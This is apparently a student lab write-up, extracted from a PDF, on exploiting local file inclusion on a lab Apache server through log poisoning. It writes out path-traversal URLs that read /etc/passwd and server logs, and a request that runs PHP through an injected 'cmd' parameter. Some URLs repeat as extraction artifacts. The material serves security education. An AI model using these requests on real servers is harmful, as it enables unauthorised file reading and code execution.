8/15/2019 LFI vulnerability

1/7

8/15/2019 LFI vulnerability

2/7

Objective

Demonstrate and exploit the LFI vulnerability on an Apache Server through ApacheLog Injection.

MethodsThe first thing that is necessary to do is verify if the apache server that is the objective

to the attack is vulnerable, thus we send a directory transversal attack in order to

verify this, in the URL of the web application that are contain in the server we put thedirectory /etc/passwd at the final of the string like this:

http://192.168.2.250/esime/lfi/exercise1.php?file=../../../../../../../../../../../../etc/passwd%00 

The result of sending this URL is show below:

Figure 1 Apache /etc/passwd contain

The directory to which we agreed contains users and passwords that manages the Apache server that we are attacking, it also let us to know the OS on which the server

is installed, in this case is FreeBSD.Once that we verify that the vulnerability exists in the server we proceed to search

where is the access log located because we are going to use an Apache log injectionattack, for this we access to the default distro’s layout:

http://wiki.apache.org/httpd/DistrosDefaultLayout 

http://192.168.2.250/esime/lfi/exercise1.php?file=../../../../../../../../../../../../etc/passwd%00http://192.168.2.250/esime/lfi/exercise1.php?file=../../../../../../../../../../../../etc/passwd%00http://192.168.2.250/esime/lfi/exercise1.php?file=../../../../../../../../../../../../etc/passwd%00http://wiki.apache.org/httpd/DistrosDefaultLayouthttp://wiki.apache.org/httpd/DistrosDefaultLayouthttp://wiki.apache.org/httpd/DistrosDefaultLayouthttp://192.168.2.250/esime/lfi/exercise1.php?file=../../../../../../../../../../../../etc/passwd%00http://192.168.2.250/esime/lfi/exercise1.php?file=../../../../../../../../../../../../etc/passwd%00

8/15/2019 LFI vulnerability

3/7

8/15/2019 LFI vulnerability

4/7

 Another test that we can do is to try to get the Error logs of the server, for this we

send the next request:

192.168.2.250/esime/lfi/exercise1.php?file=../../../../../../../../../../../../var/log/httpd-error.log%00

Below we can see that we also obtain the error logs of the apache server

Figure 4 Error logs contains on the Apache Server

Once that we found the logs of the server we proceed to inject PHP code to the

server via a raw socket connection, in this case I use Telnet, once that we connectto the server we inject the PHP code that is below.

GET / HTTP/1.1 

Where:

GET  Is using in order to the data that are send by the server as an answer to arequest will be visible on the browser.

Eval Evaluates a string as PHP code. The string must be valid PHP code and mustend with semicolon. In this case eval let us execute commands “cmd” in the server. 

CMD Is the name of the variable that let us send data through GET

The process to connect with the server and the injection of the code is show below.

8/15/2019 LFI vulnerability

5/7

 

Figure 5 Connection with the server and code injection

 After the code injection we proceed to verify that it is function correctly by sendingthe follow URL

http://192.168.2.250/esime/lfi/exercise1.php?file=../../../../../../../../../../../../var/log/httpd-access.log%00&cmd=phpinfo();%00 

The result of this request is show below (the cmd window is only for demonstratethat the request is send by my IP)

Figure 6 PHPinfo obtain via LFI attack

http://192.168.2.250/esime/lfi/exercise1.php?file=../../../../../../../../../../../../var/log/httpd-access.log%00&cmd=phpinfo();%00http://192.168.2.250/esime/lfi/exercise1.php?file=../../../../../../../../../../../../var/log/httpd-access.log%00&cmd=phpinfo();%00http://192.168.2.250/esime/lfi/exercise1.php?file=../../../../../../../../../../../../var/log/httpd-access.log%00&cmd=phpinfo();%00http://192.168.2.250/esime/lfi/exercise1.php?file=../../../../../../../../../../../../var/log/httpd-access.log%00&cmd=phpinfo();%00http://192.168.2.250/esime/lfi/exercise1.php?file=../../../../../../../../../../../../var/log/httpd-access.log%00&cmd=phpinfo();%00

8/15/2019 LFI vulnerability

6/7

Once we are able to send cmd request we can obtain UID, PHPinfo, and the rc.conf

data from the server, below I show the id and the rc.conf data

Figure 7 Rc.conf directory

Figure 8 Server UID

Exists a lot of forms to inject code but most of all give us the same result, one of

them is inject a .txt file via a raw socket with the PUT method, an example of it isshow below:

telnet 192.168.116.134 80

trying to connect 192.168.116.134 80

PUT /file_name.txt HTTP/1.1

8/15/2019 LFI vulnerability

7/7

The content of the .txt file is the following php code

The code let us to obtain the server info via apache commands like the previousprocess that I explain before.

Conclusions

The development of this exercise wasn’t successful because I couldn’t obtain a

remote shell, despite this the knowledge obtain is very valuable because from thisattack a lot of attacks can be done and consequently prevent allowing an

improvement to the security student. Personally I will continue with this exercise andI hope to achieve the full objective and share to the teacher.